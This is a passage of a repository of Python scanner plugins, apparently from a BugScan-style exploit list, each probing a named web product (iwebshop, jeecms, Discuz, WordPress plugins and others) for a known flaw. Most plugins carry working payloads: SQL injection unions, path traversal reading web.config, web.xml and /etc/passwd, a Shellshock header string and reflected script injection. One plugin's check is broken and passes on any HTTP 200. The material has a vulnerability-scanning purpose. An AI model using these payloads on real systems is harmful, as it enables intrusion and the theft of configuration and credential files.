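    payload = 'pub/temp.aspx?type=menu&nj=wooyun%27%20union%20all%20select%201,db_name(1)--'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl2(url)
    if code == 200 and 'master' in res:
        security_hole(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('kingosoft_xsweb', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1354.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#Author:judger
#SerType:iwebshop SQL-Injection
def assign(service, arg):
    """Accept targets fingerprinted as 'iwebshop'; returns (True, arg)."""
    if service == "iwebshop":
        return True, arg

def audit(arg):
    """Probe the getProduct 'specJSON' parameter for SQL injection.

    Reports via security_hole when the reply is HTTP 200 and contains the
    md5 of '1', which the injected md5(1) is expected to produce.
    """
    payload = '''index.php?controller=site&action=getProduct&specJSON={"judger":"1'%20and%201=0%20union%20select%20md5(1),2,3,4,5,6,7,8,9%20and%20'1'%20=%20'1"}'''
    url = arg + payload
    code, head, body, errcode, _url = curl.curl2(url)
    if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:
        security_hole('SQL-Injection:' + url)


if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('iwebshop', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1356.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Warsong
#_PlugName_ = Wanhu ezEIP arbitrary file download
#_Function_ = plugin format
#_FileName_ = whezeip_Download_Anything.py
def assign(service, arg):
    """Accept targets fingerprinted as 'whezeip'; returns (True, arg)."""
    if service == "whezeip":
        return True, arg

def audit(arg):
    """Check the download.ashx 'files' parameter for reading web.config.

    Reports via security_warning when the reply is HTTP 200 and contains
    both 'rootRollingFile' and 'cachingConfiguration'.
    """
    payload = 'download.ashx?files=../web.config'
    url = arg + payload
    code, head, body, errcode, fina_url = curl.curl(url)
    if code == 200 and 'rootRollingFile' in body and 'cachingConfiguration' in body:
        security_warning(url)
if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('whezeip', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1358.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#Author:judger
#SerType:jeecms arbitrary file download
def assign(service, arg):
    """Accept targets fingerprinted as 'jeecms'; returns (True, arg)."""
    if service == "jeecms":
        return True, arg

def audit(arg):
    """Check the download.jspx 'fpath' parameter for reading WEB-INF/web.xml.

    Reports via security_hole when the reply is HTTP 200 and contains
    'com.jeecms.common.web.ProcessTimeFilter'.
    """
    payload = "download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml"
    url = arg + payload
    code, head, body, errcode, _url = curl.curl2(url)
    if code == 200 and 'com.jeecms.common.web.ProcessTimeFilter' in body:
        security_hole('Arbitrary file download:' + url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('jeecms', 'http://www.example.com/')[1])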
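--------------------------------------------------------------------------------
/exp_list/exp-1359.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = ali
#_FileName_ = SiteFactory CMS 5.5.9.py
#https://www.bugscan.net/#!/x/22441

def assign(service, arg):
    """Accept targets fingerprinted as 'sitefactory'; returns (True, arg)."""
    if service == "sitefactory":
        return True, arg

def audit(arg):
    """Check the download.aspx 'file' parameter for reading win.ini.

    Reports via security_hole (with the base URL, not the probe URL) when
    the reply is HTTP 200 and contains '[mci extensions]'.
    """
    # Raw string: same value as before, without relying on '\w' being an
    # unrecognised escape sequence.
    payload = r'sitefactory/assets/download.aspx?file=c%3a\windows\win.ini'
    target = arg + payload
    code, head, body, _, _ = curl.curl2(target)
    if code == 200 and '[mci extensions]' in body:
        security_hole(arg)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('sitefactory', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1363.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#-*- encoding:utf-8 -*-
#__author__ = '1c3z'
#ref http://wooyun.org/bugs/wooyun-2014-077491

def assign(service, arg):
    """Accept targets fingerprinted as 'ecscms'; returns (True, arg)."""
    if service == "ecscms":
        return True, arg


def audit(arg):
    """Probe SubSiteMoreIndex.aspx 'kw' for error-based SQL injection.

    Reports via security_hole when the reply is HTTP 500 and contains
    'master', 'nvarchar' and 'int'.
    """
    payload = 'OperationManage/SubSiteMoreIndex.aspx?pkId=511&subSiteId=256&kw=Xasd%25%27%20and%201=db_name%281%29--&st=1&t=1'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl2(url)
    if code == 500 and 'master' in res and 'nvarchar' in res and 'int' in res:
        security_hole(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('ecscms', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-138.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = 'boy'


def assign(service, arg):
    """Accept targets fingerprinted as 'php168'; returns (True, arg)."""
    if service == "php168":
        return True, arg

def audit(arg):
    """Request news/js.php with a malformed f_id and look for a SQL error.

    Reports via security_info when the body contains 'SELECT'. The HTTP
    status is not checked.
    """
    code, head, res, errcode, finalurl = curl.curl('%snews/js.php?type=hot&f_id=23)' % arg)
    # Guard against an empty body, as the discuz and phpcms plugins in this
    # listing do; presumably the body can be empty when the request fails.
    if res and res.find("SELECT") != -1:
        security_info('find sql injection:%snews/js.php?type=hot&f_id=23)' % arg)
if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('php168', 'http://www.example.com/')[1])

--------------------------------------------------------------------------------
/exp_list/exp-139.py:
--------------------------------------------------------------------------------
# -*- coding: cp936 -*-
"""
scanner - Network scanner.
Author : Tommy.
"""
__version__ = '1.0'

def assign(service, arg):
    """Accept 'www' targets whose URL contains 'cgi-bin'.

    Returns (True, arg) for a match; anything else returns None.
    """
    if service == "www":
        if "cgi-bin" in arg:
            return True, arg

def audit(arg):
    """Send a User-Agent carrying a function-definition string and a marker.

    Reports via security_hole when the reply is HTTP 200 and the marker
    appears in the headers or the body.
    """
    payload = '''() { :;}; echo d5f4f931d08210b1ed6e98d26b6318b6:'''
    # The request is passed as a curl-style option string; arg is
    # interpolated into it unquoted.
    code, head, res, errcode, _ = curl.curl('-A "%s" %s' % (payload, arg))
    if code == 200 and 'd5f4f931d08210b1ed6e98d26b6318b6' in head + res:
        security_hole(arg)

if __name__ == "__main__":
    # Self-test entry point; the target is a constructed placeholder URL
    # (it must contain 'cgi-bin' for assign to accept it).
    from dummy import *
    audit(assign('www', 'http://www.example.com/cgi-bin/test.sh')[1])

--------------------------------------------------------------------------------
/exp_list/exp-1393.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

import re

def assign(service, arg):
    """Accept targets fingerprinted as 'xr_gatewayplatform'; returns (True, arg)."""
    if service == "xr_gatewayplatform":
        return True, arg

def audit(arg):
    """Check two msa/ request forms for path traversal to /etc/passwd.

    Reports via security_warning for each request whose reply is HTTP 200
    and contains both 'root' and '/bin/bash'.
    """
    payloads = ['msa/../../../../../../../../etc/passwd', '/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=test.txt+downLoadFile=../etc/passwd']
    for payload in payloads:
        url = arg + payload
        code, head, res, errcode, _ = curl.curl(url)
        if code == 200 and 'root' in res and '/bin/bash' in res:
            security_warning(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('xr_gatewayplatform', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-1406.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#__Author__= Sevsea
#_PlugName= Wanhu download_old.jsp arbitrary file download
#_FileName_= wanhu_download_old.py
def assign(service, arg):
    """Accept targets fingerprinted as 'whezeip'; returns (True, arg)."""
    if service == "whezeip":
        return True, arg

def audit(arg):
    """Check download_old.jsp 'FileName' for reading WEB-INF/web.xml.

    Reports via security_warning when the reply is HTTP 200 and the marker
    test passes.
    """
    payload = 'defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml'
    url = arg + payload
    code, head, body, errcode, fina_url = curl.curl(url)
    # NOTE(review): the marker literal is empty as extracted, which makes
    # the second test always true; the upstream marker was probably markup
    # lost in extraction. As written, any HTTP 200 is reported.
    if code == 200 and '' in body:
        security_warning(url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('whezeip', 'http://www.example.com/')[1])
--------------------------------------------------------------------------------
/exp_list/exp-141.py:
--------------------------------------------------------------------------------
#Referer:http://www.wooyun.org/bugs/wooyun-2014-084097
def assign(service, arg):
    """Accept targets fingerprinted as 'discuz'; returns (True, arg)."""
    if service == "discuz":
        return True, arg

def audit(args):
    """Check admincp.php for reflection of the 'handlekey' parameter.

    Reports via security_info when the reply is HTTP 200 and the value is
    echoed unescaped inside the page's script.
    """
    payload = "/admincp.php?infloat=yes&handlekey=123);alert(/testvul/);//"
    verify_url = args + payload
    code, head, content, errcode, finalurl = curl.curl(verify_url)
    if code == 200 and "if($('return_123);alert(/testvul/);//'" in content:
        security_info(verify_url)

if __name__ == '__main__':
    # Self-test entry point; the target is a placeholder host.
    from dummy import *
    audit(assign('discuz', 'http://www.example.com/')[1])

--------------------------------------------------------------------------------
/exp_list/exp-1417.py:
--------------------------------------------------------------------------------
# !/usr/bin/dev python
# -*- coding:utf-8 -*-
#__Author__ = buliuchang
# __refer__ = https://www.exploit-db.com/exploits/37244/

def assign(service, arg):
    """Accept targets fingerprinted as 'wordpress'; returns (True, arg)."""
    if service == "wordpress":
        return True, arg

def audit(arg):
    """Probe the wp-symposium get_album_item.php 'size' parameter.

    Reports via security_hole when the reply is HTTP 200 and contains the
    md5 of '1', which the injected md5(1) is expected to produce.
    """
    payload = 'wp-content/plugins/wp-symposium/get_album_item.php?size=md5(1);--'
    target = arg + payload
    code, head, res, ecode, redirect_url = curl.curl(target)
    if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in res:
        security_hole(target)

if __name__ == '__main__':
    # Self-test entry point (local instance).
    from dummy import *
    audit(assign('wordpress', 'http://localhost/wordpress/')[1])

--------------------------------------------------------------------------------
/exp_list/exp-142.py:
--------------------------------------------------------------------------------
#Referer: http://www.securityfocus.com/archive/1/534437
def assign(service, arg):
    if service == "wordpress":
        return True, arg

def audit(args):
    payload = 'wp-admin/admin.php?page=pods&action=edit&id=4%22>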